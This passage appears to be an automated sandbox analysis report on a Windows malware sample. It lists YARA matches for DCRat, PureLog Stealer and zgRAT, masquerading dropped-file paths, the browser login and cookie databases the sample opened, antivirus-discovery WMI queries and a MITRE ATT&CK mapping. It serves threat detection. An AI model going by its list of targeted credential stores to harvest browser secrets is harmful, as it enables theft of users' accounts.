                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe PID: 4708, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe PID: 8536, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.450000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Downloads\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts241
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Web Service                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory144
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		1
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                            Obfuscated Files or Information                            		Security Account Manager341
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		11
                            Encrypted Channel                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets261
                            Virtualization/Sandbox Evasion                            		SSHKeylogging14
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                            Masquerading                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                            Virtualization/Sandbox Evasion                            		DCSync1
                            System Network Configuration Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
